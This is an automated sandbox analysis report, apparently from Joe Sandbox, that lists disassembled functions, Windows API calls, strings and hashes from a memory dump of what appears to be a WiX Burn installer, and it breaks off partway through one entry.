Instruction Fuzzy Hash: 93F0A732B413306FE720666AAC09F877AC8EF04BA1F015125FD0CF6191D6159D04D6E4

Function 00E555BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00E555D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00E55633

Strings

Failed to initialize COM on cache thread., xrefs: 00E555E5

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: efd9a6e6a6b9334dcd991cdd4620df7679bd72dd22f6fea1f466168cb9fe5f6c
Instruction ID: e0e81b4754a4c1b295da4a3f8f5a14924e18a301b76169260e1ed12f561fd674
Opcode Fuzzy Hash: efd9a6e6a6b9334dcd991cdd4620df7679bd72dd22f6fea1f466168cb9fe5f6c
Instruction Fuzzy Hash: 3F016D72600619BFCB059FA5DC84DDAF7ECFF08354B409126FA08E7121DB71AD588B90

Function 00E4501B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00E41104,?,?,00000000), ref: 00E4503A
CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00E41104,?,?,00000000), ref: 00E4506A

Strings

burn.clean.room, xrefs: 00E45027, 00E45034, 00E45061

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 0dddd2647979adaa339a6e7853dfda4a5c9d0cdc46f524af9cc33be1db383617
Instruction ID: f6a8130ea7a323e88705cd0d6e7fedf664d867cd4a131dedbf00eab3adcc68dc
Opcode Fuzzy Hash: 0dddd2647979adaa339a6e7853dfda4a5c9d0cdc46f524af9cc33be1db383617
Instruction Fuzzy Hash: 1E01F977A00725AF83204B5ABC84D77B7ACFB097547145126F509F3611C370AC44C7E1

Function 00E847D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,?,00000000,00000000,00000000,?,00E86219,?,?,00000000,00000000,00000000,00000001), ref: 00E847EB
GetLastError.KERNEL32(?,00E86219,?,?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,00E85AC5,?,?,?), ref: 00E847F5

Strings

fileutil.cpp, xrefs: 00E84819

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: bc89222a71f5226e9b127859eb90f58a277111ec5772cbdf085c5858fe8266be
Instruction ID: 39d847fac1e738e6e278d2c3577c4edf481789bffc654d78323f511c66602b7f
Opcode Fuzzy Hash: bc89222a71f5226e9b127859eb90f58a277111ec5772cbdf085c5858fe8266be
Instruction Fuzzy Hash: 15F03171A00269AF9B149F95DC09DAB7BE8EF09755F014119BD0DE7260D631DD10D7E0

Function 00E437EA Relevance: 4.6, APIs: 3, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00E43829
GetLastError.KERNEL32 ref: 00E43833
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00E4389B

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: c7ea9060b192730e9e23937a2ec793335cfb80cfb696b700bd73e91d7571eb7e
Instruction ID: 636f13f58edb6c8edcace75ba02fc5e1f44632c8b88ace66e4054a4ac0844a35
Opcode Fuzzy Hash: c7ea9060b192730e9e23937a2ec793335cfb80cfb696b700bd73e91d7571eb7e
Instruction Fuzzy Hash: 5321C8B2D0132967DB20DB75AC49F9BB7AC9B08750F1101A5BE08F7281E630DE488BE0

Function 00E43999 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00E43B34,00000000,?,00E41472,00000000,80004005,00000000,80004005,00000000,000001C7,?,00E413B7), ref: 00E439A3
RtlFreeHeap.NTDLL(00000000,?,00E43B34,00000000,?,00E41472,00000000,80004005,00000000,80004005,00000000,000001C7,?,00E413B7,000001C7,00000100), ref: 00E439AA
GetLastError.KERNEL32(?,00E43B34,00000000,?,00E41472,00000000,80004005,00000000,80004005,00000000,000001C7,?,00E413B7,000001C7,00000100,?), ref: 00E439B4

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: e0b177671768d23646d98a3cdd18a94c0046c5333e26906701146e5bd72a7a62
Instruction ID: db8ea153273264ff29cdef06fbc47481764dcfe65cc160c6984cd63a83d17b9f
Opcode Fuzzy Hash: e0b177671768d23646d98a3cdd18a94c0046c5333e26906701146e5bd72a7a62
Instruction Fuzzy Hash: DDD012326016346B97102BFB6D0C697BE9CEF456A1B014021FE09E6110D735881497E4

Function 00E4F5E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E80E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,00E85699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 00E80E52

RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00E57B4D,?,?,?), ref: 00E4F644

Part of subcall function 00E80EEC: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000078,00000000,?,?,?,00E856EF,00000000,?,00E863FF,00000078,00000000), ref: 00E80F10

Strings

Installed, xrefs: 00E4F60C

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Installed
API String ID: 3677997916-3662710971
Opcode ID: 6c2e909fda16c529a66bf0a86db343258d02a79fe0d19f154ee6af568786f59b
Instruction ID: 1f205933f4e30ba0226597dc6033c9475f220702887d620870a12f7537409c26
Opcode Fuzzy Hash: 6c2e909fda16c529a66bf0a86db343258d02a79fe0d19f154ee6af568786f59b
Instruction Fuzzy Hash: 10018F32810218FFCF11EB94D946BDEBBA8EF04711F1241A4E804B7160D3765E54DBD0

Function 00E89006 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,000000B0,00000088,00000410,000002C0), ref: 00E8905C

Part of subcall function 00E80E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,00E85699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 00E80E52

Strings

%ls%ls\%ls\%ls, xrefs: 00E89029

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: %ls%ls\%ls\%ls
API String ID: 47109696-1267659288
Opcode ID: f295148db0d2e268c79e4f3cb32140f36639fe0d0cb1e990acc44b32216a7ced
Instruction ID: bfb1882e3b937bb3c7ff28e3ae99f66e5c2422d889f6dea260a630552bd7bb71
Opcode Fuzzy Hash: f295148db0d2e268c79e4f3cb32140f36639fe0d0cb1e990acc44b32216a7ced
Instruction Fuzzy Hash: A2014B32C00218FFDF22ABD0DC06BEEBBB9EB04366F145095F90876061D7765A64EB91

Function 00E43A72 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,?,00E4227D,?,000001C7,00000001,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000), ref: 00E43A86
RtlReAllocateHeap.NTDLL(00000000,?,00E4227D,?,000001C7,00000001,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000,00000000,8007139F), ref: 00E43A8D

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6a0c6608990693a3a23bccdb964df5aa4b313df4930f3d777ebf6da2652d2572
Instruction ID: 2384cc911f3a36078dbbccc288d64c3392023f1022c1afd0403a8bb6c044b1d9
Opcode Fuzzy Hash: 6a0c6608990693a3a23bccdb964df5aa4b313df4930f3d777ebf6da2652d2572
Instruction Fuzzy Hash: 81D0C932150209AFCF005FE9DC0DDAE3BADEB58612B008405B919DA110C739E4649B60

Function 00E438D4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,00E42284,000001C7,00000001,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000,00000000,8007139F), ref: 00E438E5
RtlAllocateHeap.NTDLL(00000000,?,00E42284,000001C7,00000001,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000,00000000,8007139F), ref: 00E438EC

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: fddc9620203af1b3ac1372e8ba005b7d41b65050e1c7e97e4cbe01ee7541d6a6
Instruction ID: 3a45b5389bbe977ccbb99f741d9e0b11d5c01feed757f4df227acb2a9cf5d314
Opcode Fuzzy Hash: fddc9620203af1b3ac1372e8ba005b7d41b65050e1c7e97e4cbe01ee7541d6a6
Instruction Fuzzy Hash: D2C012321A020AABCB006FF9ED4EC9A3BACAB286027008400B909DA110CB3CE0188B60

Function 00E83499 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E834CE

Part of subcall function 00E82F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00E834DF,00000000,?,00000000), ref: 00E82F3D
Part of subcall function 00E82F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E6BDED,?,00E452FD,?,00000000,?), ref: 00E82F49

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: d37c95be328cb23c4d794708a73ee1eba34fd40f9e63afabbfd6b3d8c947ccb7
Instruction ID: 0c54536ef896fda703b034fd4c0be8d2badf050dc9d7bca2ba00f79ef25074ca
Opcode Fuzzy Hash: d37c95be328cb23c4d794708a73ee1eba34fd40f9e63afabbfd6b3d8c947ccb7
Instruction Fuzzy Hash: 6531FB76E016199FCB11DFA8C884AEEB7F8EF08750F01556AED19FB211D6719D048BA0

Function 00E6993C Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00E699A4

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: 0061dcf192fe11a7c541963055e8e196b4a9f8312037f176f433c5f25693e8ba
Instruction ID: 736cde39918259c11354c61921997ea6213d075bc708eb944a7215e1a753d8b6
Opcode Fuzzy Hash: 0061dcf192fe11a7c541963055e8e196b4a9f8312037f176f433c5f25693e8ba
Instruction Fuzzy Hash: 7D214471200604AFEB20CE56E880D67B7FEFFC8794710991DFA86A7612C231EC41CB60

Function 00E8907D Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E88CFB: lstrlenW.KERNEL32(00000100,?,?,00E89098,000002C0,00000100,00000100,00000100,?,?,?,00E67B40,?,?,000001BC,00000000), ref: 00E88D1B

RegCloseKey.ADVAPI32(000002C0,000002C0,00000100,00000100,00000100,?,?,?,00E67B40,?,?,000001BC,00000000,00000000,00000000,00000100), ref: 00E89136

Part of subcall function 00E80E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,00E85699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 00E80E52

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseOpenlstrlen
String ID:
API String ID: 514153755-0
Opcode ID: d9864c73de90ff7ed43ba1427763d5acf8fd2e24f0ca97e8665fbfdb6f3c1d36
Instruction ID: abb782d799a69da0159c3e0dad4d8e527f45383caca557a8be0c934552c4cf7d
Opcode Fuzzy Hash: d9864c73de90ff7ed43ba1427763d5acf8fd2e24f0ca97e8665fbfdb6f3c1d36
Instruction Fuzzy Hash: A7218672C0152AEFCF22BEA4CC498AEBAB5EB44750B165265FD0DB7121D3324E50EBD0

Function 00E5EBA8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00E5EBE0

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Open@16
String ID:
API String ID: 3613110473-0
Opcode ID: 29c1a251978a583d007ae1e4ec72e815610297a601cefb902dd62b68fe2ab955
Instruction ID: 6e6326573e66c902a10a8bd56128fca612a9285cce4980617dca128bebe6111c
Opcode Fuzzy Hash: 29c1a251978a583d007ae1e4ec72e815610297a601cefb902dd62b68fe2ab955
Instruction Fuzzy Hash: 4311BFB290025AABDB18DF88D880D9EFBA8EB54361F1059A9FD44B7300D731EE149B90

Function 00E85728 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00EAAAA0,00000000,?,0104ABA0,?,00E5890E,WiX\Burn,PackageCache,00000000,00EAAAA0,00000000,?,?), ref: 00E85782

Part of subcall function 00E80F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,?), ref: 00E80FE4
Part of subcall function 00E80F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00E8101F

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: cae6ea3bc43dd73c9d414a0ac0a8749a446facfda7546a29472305438e96a6fa
Instruction ID: 5c97078289059a437c277cc2130861cdfe5eac1568c2c004f2602f4945ed4ba9
Opcode Fuzzy Hash: cae6ea3bc43dd73c9d414a0ac0a8749a446facfda7546a29472305438e96a6fa
Instruction Fuzzy Hash: 1911A077801529EBCF21BEA4DC819AEB6A9EB04324B15923AFD5D77110CB324D50DBD1

Function 00E434C5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,?,00E589CA,0000001C,?,00000000,?,?), ref: 00E434E5

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: ffb254b8fc6fa88080d5a04726799bdf561093aa5a95d856ad3bb1a9672dadb5
Instruction ID: 0ca9ef7000c9b1e9aeda0918cc971d3a0ce86a1337a2a5f608153b0b88916ff3
Opcode Fuzzy Hash: ffb254b8fc6fa88080d5a04726799bdf561093aa5a95d856ad3bb1a9672dadb5
Instruction Fuzzy Hash: 64E012763012257BEA022E727C09DEB7B9CDF057517009055BE44F6010E661E95087B4

Function 00E440E2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000000,?,00E5A229,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?), ref: 00E440EB

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 82ed2de02211419f3d13d543167add7a36091daa237277b077080b71b8690136
Instruction ID: 5653c719226495e18a98485f5699e09e13364d67ba1d2626a04c96430efd0477
Opcode Fuzzy Hash: 82ed2de02211419f3d13d543167add7a36091daa237277b077080b71b8690136
Instruction Fuzzy Hash: 36D02B713031241747198E69AC046667B19DF127B43014214EC14FA6E0C3308C51C3C0

Function 00E7F36A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7F35B

Part of subcall function 00E89814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E89829
Part of subcall function 00E89814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E89891
Part of subcall function 00E89814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E898A2

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 24f3343fab009e83276b34944c85dffe1627fa50376aab0fc0a0ea932d5f1bc7
Instruction ID: 1d6ac392feeead504ebfff3555da826eeca742007f8bd404d873a44c4d84bf14
Opcode Fuzzy Hash: 24f3343fab009e83276b34944c85dffe1627fa50376aab0fc0a0ea932d5f1bc7
Instruction Fuzzy Hash: 56B01291658642BE324C63246E03C37018CC2CBF2133CF03EF10DFA041F8842C056132

Function 00E7F37A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7F35B

Part of subcall function 00E89814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E89829
Part of subcall function 00E89814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E89891
Part of subcall function 00E89814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E898A2

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 1a4dacdb2d39bdce8ad82ae7eea44273c20e483f9680c8f28887326d94faf700
Instruction ID: 3a4b18e63a9cbd76334a4b87433f5e66c48fcd50a0eeee246f7d913252e4c779
Opcode Fuzzy Hash: 1a4dacdb2d39bdce8ad82ae7eea44273c20e483f9680c8f28887326d94faf700
Instruction Fuzzy Hash: 9BB09291658642AD3248622429028360188C2CAB21328E13AF108EA041E88028446132

Function 00E7F349 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7F35B

Part of subcall function 00E89814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E89829
Part of subcall function 00E89814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E89891
Part of subcall function 00E89814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E898A2

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
